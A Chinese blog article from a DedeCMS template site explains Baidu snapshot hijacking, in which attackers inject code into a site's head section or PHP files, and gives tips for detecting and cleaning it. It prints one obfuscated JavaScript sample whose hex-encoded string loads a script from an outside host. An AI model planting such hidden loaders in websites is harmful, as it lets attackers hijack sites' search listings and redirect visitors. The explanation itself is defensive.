欢迎来到六久阁织梦模板网!
什么是快照劫持及解决办法?

什么是快照劫持及解决办法?

浏览次数: 0

作者: 六久阁织梦模板网

信息来源: 未知

更新日期: 2017-10-31

文章简介

百度快照劫持就是黑客通过技术手段拿到你网站 FTP 权限或者数据库权限植入代码或添加劫持脚本,把他想要的内容写进一个页面代码里,在首页 Head 标签下调用,当搜索引擎访问你网站的时候抓取到你网站的标题 - 关键词 - 描述的时候,就会抓取到黑客设定的任何

  • 正文开始
  • 热门文章

  百度快照劫持就是黑客通过技术手段拿到你网站FTP权限或者数据库权限植入代码或添加劫持脚本,把他想要的内容写进一个页面代码里,在首页Head标签下调用,当搜索引擎访问你网站的时候抓取到你网站的标题-关键词-描述的时候,就会抓取到黑客设定的任何内容!

 

一般用site命令查看百度快照情况,如

site:lol9.cn

 

 如果看到和你写的标题、描述不一样,就可以判断是黑客对快照进行劫持。了解常见的劫持方法,防患于未然,保障网站安全。

百度快照劫持


从上面的截图看来中标的不在少数哇,点击“百度快照”查看快照信息,标题、描述、关键词都正常,时间也是较新的。尝试投诉快照,情况依旧,就给百度反应情况,还在等待回复中。


       除了找百度解决问题之前,还需要对自己的网站进行查找、修复等操作,以免再次受到攻击。

放到<head>标签

       网站设计中<head>标签里面有标题、描述、关键词等内容,这部分是明显写上去的,如果是写到生成后的静态首页html文件里,每次更新首页都会消失。但如果不久后又被修改了,就有可能是通过其他木马定时修改的,要注意找出来。

       DedeCMS为例,有些文件夹是禁止执行脚本的,所以能修改你的文件肯定在能执行的文件夹内,如果对文件结构不是很熟悉的,可以和官方的文件夹进行对比就能找出问题所在。

伪装JS文件、修改PHP文件

 

       这个我们你一定经历过,比如DedeCMS的版权信息,如果你用{dede:global.cfg_poweby/},后面都会加上自带的织梦链接;下载的模板会在友情链接里面加入模板开发者的友情链接,这些链接是在模板里面看不到的,每次刷新位置都不一样。

       需要注意的是,浏览器并不识别JS脚本,如果用JS的方式插入链接,在查看源代码里面是完全看不到具体内容的。其实这个方法也并不高级,常见的如:

<script src="../include/js/jq.js" language="javascript" type="text/javascript"></script>

       js文件里面有类似这样的代码:

var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"];

document.writeln(_$[0]);


       第一句是通过加密的代码,第二句输出内容,一般服务器做特殊处理,才能输出正确的内容,所以应该还有一些PHP文件。

       PHP有许多包含的写法,比如/include文件夹,在核心的PHP文件里面加入劫持代码,神不知鬼不觉。

       上面的方法都是比较常见的,一般的CMS有一定的防护能力,只要自己的数据库、服务器密码不泄露,这些都能及时解决。

你已经成为黑客的“肉鸡”

 

       “肉鸡”可能很多人不太理解,说白了,服务器、数据库已经被黑客拿到了,或者说获得修改权限。

       百度有主动提交(投诉)快照的功能,黑客可以在晚上无人值守的时候偷偷修改模板文件,生成主页后向百度提交URL,然后再回复成原来的样子。

快照劫持总结

 

       黑客通过快照劫持代码能实现百度快照劫持,是黑帽SEO比较早的技术,通过劫持webshell网站,实现自己的网站排名,主要功能是改变webshell网站的快照,使其快照显示为你设置的快照,这个时候对方的网站快照(包括标题,关键字,描述都变成你的)

       代码通过实现快照变成你的,当然排名也变成你的,通过内置的跳转代码,每次通过搜索引擎点进去,网站就会跳转到其他网站。这就是百度快照劫持的原理,以及更高级的301权重劫持手法!


插件下载说明

未提供下载提取码的插件,都是站长辛苦开发!需要的请联系本站客服或者站长!

织梦二次开发QQ群

本站客服QQ号:862782808(点击左边QQ号交流),群号(383578617) DedeCMS织梦教程QQ群 如果您有任何织梦问题,请把问题发到群里,阁主将为您写解决教程!

转载请注明: 织梦模板 » 什么是快照劫持及解决办法?

  • 百度主动推送token怎么获取?
    阅读
    百度主送推送是在百度站长工具改版升级之后推出的一款帮助站长快速向百度提交链接的工具,有助于让百度快速发现新链接,促进网站收录。它是所有提交方式里面最为快速的一种,建议站长将站点当天新产出链接立即通过此方式推送给百度,以保证新链接可以及时被...
  • 利用.htaccess绑定m二级域名到二级m目录最有效方法
    阅读
    利用 .htaccess 绑定域名到子目录 , 前提你的空间服务器必须支持 apache 的 rewrite 功能,只有这样才能使用 .htaccess 。如果你的空间是 Linux 服务器 一般默认都开启了的。 首先在本地建个 txt 文件,复制下面的代码修改替换你要绑的域名和目录,并传到网...
  • 阿里云服务器ECS远程连接方式安装宝塔面板详细教程
    阅读
    一、首先我们打开ecs服务器购买页面: 阿里云的优惠力度还是蛮大的,大家可以点击下面链接进行购买。 阿里云打折服务器ECS购买地址: https://promotion.aliyun.com/ntms/act/qwbk.html?userCode=h86li0wm 1、进入ECS配置页面: 找到ecs服务器,点击进入配置...
  • 搜狐畅言评论悬浮窗广告终极去除方法永久有效
    阅读
    搜狐畅言评论悬浮窗广告去除具体效果,大家也可以看六久阁织梦模板网的效果,畅言广告已经被屏蔽。 下面六久阁就说说解决方法: 原理:破解畅言广告JS,JS本地化调用 具体操作: 大家把这个六久阁制作好的JS文件:http://www.lol9.cn/style/changyan/changya...
  • 20份SEM竞价数据报表模板下载分享
    阅读
    分享的竞价员专用报表多达20份,不仅仅局限于医疗行业,主要报表有:竞价每天工作日志模板、竞价周工作总结计划模板、百度竞价日常成本核算报表、sem月度计划总结 模板、每日竞价报表-来院渠道、竞争对手关键词排位报表--医疗网络部 整理、查词表 模板、小时...
  • 什么是快照劫持及解决办法?
    阅读
    百度快照劫持就是黑客通过技术手段拿到你网站 FTP 权限或者数据库权限植入代码或添加劫持脚本,把他想要的内容写进一个页面代码里,在首页 Head 标签下调用,当搜索引擎访问你网站的时候抓取到你网站的标题 - 关键词 - 描述的时候,就会抓取到黑客设定的任何...
  • 电脑pc端的网页自适应显示在移动端方法
    阅读
    当我们将一个pc端的网页放到移动端的时候,移动端浏览器会将pc端的网页按照一定的比例完整的显示出来,这是因为移动端的浏览器默认的会将网页渲染在一个比例比较大的viewport中排版(ios默认的是980px,Android4.0以上为980px),然后通过比例缩放看到整个页...
  • 阿里云香港服务器免备案30M带宽3年仅864元
    阅读
    阿里云香港服务器30M带宽3年864元 了, 这款便宜的活动机型配置为:1核+1GB内存+带宽峰值30Mbps+每月流量1TB,可以挂百个网站无压力。 购买流程 领券: 阿里云1888代金券 打开活动页面: https://common-buy.aliyun.com/?commodityCode=swasregionId=cn-hongk...
  • 利用.htaccess实现首页index.html重写与栏目页重定向
    阅读
    在以前的文章中分别说了如何用.htaccess文件实现index.html跳转、Windows创建.htaccess文件方法总结和利用.htaccess文件实现网站栏目首页的301跳转,不少搜索相关问题进来的读者反应很多都实现不了,这可能是每个服务器的差异性造成。 最近在弄公司的企业站...
  • dedecms织梦新站SEO优化技巧
    阅读
    一、网站 URL 路径优化 1. 首页 URL 的路径优化。大家安装程序后,也许会发现打开首页后其路径是这样的: http://www.XXX.com/index.html ,这种路径远没有 http://www.XXX.com/ 路径好。那么怎么去掉后面的 index.html 呢?具体方法是将根目录下的 index.ph...
收藏此文 打赏本站

如本文对您有帮助,就请六久阁织梦模板网抽根烟吧!

  • 支付宝打赏
    支付宝扫描打赏
    微信打赏
    微信扫描打赏
利用.htaccess绑定m二级域名到二级m目录最有效方法
« 上一篇 2017年11月01日
网站生成静态页面更利于SEO优化
下一篇 » 2017年09月17日

精彩评论

有问题在这里提问,阁主会为你解决!
  • 全部评论(0
    还没有评论,快来抢沙发吧!
推荐精品模板更多
织梦HTML5响应式自适应文化传媒公司网站模板
更新时间:2019-09-19

人已经看过了!

营销型家电厨具用品织梦模板(带手机端)
更新时间:2019-11-09

人已经看过了!

蓝色装修工程建设类企业响应式织梦模板
更新时间:2019-11-11

人已经看过了!

现代简约HTML5自适应家装设计类织梦模板
更新时间:2018-04-17

人已经看过了!

东方头条新闻资讯织梦模板 带数据同步手机站
更新时间:2017-08-10

人已经看过了!

织梦简洁好看小说模板源码下载带手机端
更新时间:2019-12-15

人已经看过了!

安防监控_电子数码_医疗设备织梦自适应模板
更新时间:2017-08-10

人已经看过了!